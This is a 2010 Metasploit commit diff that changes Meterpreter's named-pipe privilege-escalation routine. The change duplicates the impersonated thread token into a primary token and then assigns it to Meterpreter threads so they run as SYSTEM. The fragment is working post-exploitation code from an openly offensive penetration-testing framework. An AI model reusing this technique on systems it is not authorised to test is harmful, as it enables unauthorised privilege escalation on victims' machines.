
Switch the namedpipe code to convert the thread token to a primary token first

git-svn-id: file:///home/svn/framework3/trunk@9756 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2010-07-09 21:40:44 +00:00
parent 869ff5fb70
commit 286d331727


@ -11,6 +11,7 @@ DWORD THREADCALL elevate_namedpipe_thread( THREAD * thread )
DWORD dwResult = ERROR_ACCESS_DENIED;
HANDLE hServerPipe = NULL;
HANDLE hToken = NULL;
HANDLE hTokenDup = NULL;
char * cpServicePipe = NULL;
Remote * remote = NULL;
BYTE bMessage[128] = {0};
@ -60,9 +61,13 @@ DWORD THREADCALL elevate_namedpipe_thread( THREAD * thread )
if( !OpenThreadToken( GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken ) )
CONTINUE_ON_ERROR( "[ELEVATE] elevate_namedpipe_thread. OpenThreadToken failed" );
// duplicate it into a primary token
if( ! DuplicateTokenEx( hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hTokenDup ) )
CONTINUE_ON_ERROR( "[ELEVATE] elevate_namedpipe_thread. DuplicateTokenEx failed" );
// now we can set the meterpreters thread token to that of our system
// token so all subsequent meterpreter threads will use this token.
core_update_thread_token( remote, hToken );
core_update_thread_token( remote, hTokenDup );
dwResult = ERROR_SUCCESS;